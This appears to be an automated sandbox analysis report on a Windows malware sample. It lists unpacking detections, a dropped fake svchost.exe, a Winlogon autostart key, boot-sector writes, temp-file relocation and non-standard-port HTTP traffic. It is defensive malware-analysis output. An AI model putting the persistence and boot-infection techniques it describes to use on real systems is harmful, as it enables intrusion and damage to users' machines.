Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.3413471748.00000000008BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb\** source: svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.3425216868.000000000827B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbernelbase.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000002.3426848307.0000000009277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516200393.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2606987058.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2520248189.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2607414214.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2585840730.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000000.2578627983.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000000.2588407921.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2670222537.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000000.2633847837.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000000.2650762709.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2734291116.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000000.2708390726.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000000.2731091721.00000000002DE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.3426848307.0000000009271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.3427813652.00000000092A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3424625782.0000000007237000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wrpcrt4.pdb1.3.6.1.4.1.311.60.3.2szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION source: svchost.exe, 00000002.00000002.3426848307.0000000009259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.3422148486.0000000004382000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\qexyfag.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\UMwpXhA46R.exeUnpacked PE file: 0.2.UMwpXhA46R.exe.400000.2.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\UMwpXhA46R.exeUnpacked PE file: 0.2.UMwpXhA46R.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: svchost.exe.0.drStatic PE information: real checksum: 0x48bbd2ed should be: 0x121dac
Source: UMwpXhA46R.exeStatic PE information: real checksum: 0x663958d2 should be: 0x121dac
Source: UMwpXhA46R.exeStatic PE information: section name: .j
Source: UMwpXhA46R.exeStatic PE information: section name: .nkytZ
Source: UMwpXhA46R.exeStatic PE information: section name: .N
Source: UMwpXhA46R.exeStatic PE information: section name: .fc
Source: UMwpXhA46R.exeStatic PE information: section name: .s
Source: UMwpXhA46R.exeStatic PE information: section name: .w
Source: svchost.exe.0.drStatic PE information: section name: .j
Source: svchost.exe.0.drStatic PE information: section name: .nkytZ
Source: svchost.exe.0.drStatic PE information: section name: .N
Source: svchost.exe.0.drStatic PE information: section name: .fc
Source: svchost.exe.0.drStatic PE information: section name: .s
Source: svchost.exe.0.drStatic PE information: section name: .w
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004000C2 push esp; ret 0_2_004000C3
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0040008D push FB0DB0C3h; ret 0_2_004000B7
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044C903 push cs; ret 0_2_0044C918
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044C939 push cs; iretd 0_2_0044C948
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044C26D push es; iretd 0_2_0044C27C
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00448CA0 push eax; ret 0_2_00448CCE
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0213065B push ebx; ret 0_2_02130677
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0213065B push dword ptr [esp+48h]; ret 0_2_02130747
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_02130678 push dword ptr [esp+48h]; ret 0_2_02130747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004000C2 push esp; ret 2_2_004000C3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040008D push FB0DB0C3h; ret 2_2_004000B7
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C903 push cs; ret 2_2_0044C918
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C939 push cs; iretd 2_2_0044C948
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C26D push es; iretd 2_2_0044C27C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00448CA0 push eax; ret 2_2_00448CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B03 push cs; ret 2_2_02CB6B18
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACB03 push esi; retf 2_2_02CACB04
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B39 push cs; iretd 2_2_02CB6B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB28A0 push eax; ret 2_2_02CB28CE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE990 push esi; retf 2_2_02CAE994
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACEB1 push esi; retf 2_2_02CACEB5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE62D push esi; retf 2_2_02CAE631
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB646D push es; iretd 2_2_02CB647C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E726D push es; iretd 2_2_029E727C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D4392 push ebp; retf 2_2_029D4393
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D410C push ebp; retf 2_2_029D410D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E3CA0 push eax; ret 2_2_029E3CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B20678 push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push ebx; ret 2_2_02B20677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012828A0 push eax; ret 6_2_012828CE

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02C82030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_01252030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u7_2_01052030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u9_2_00A32030
Drops PE files with benign system names
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\UMwpXhA46R.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403440
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02C82030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_01252030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u7_2_01052030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u9_2_00A32030
Creates an undocumented autostart registry key
Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Monitors registry run keys for changes
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Moves itself to temp directory
Source: c:\users\user\desktop\umwpxha46r.exeFile moved: C:\Users\user\AppData\Local\Temp\6D41.tmpJump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49759
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02C7C380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C78F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02C78F20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02C7BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0124C380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0124BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01248F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_01248F20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124BE40
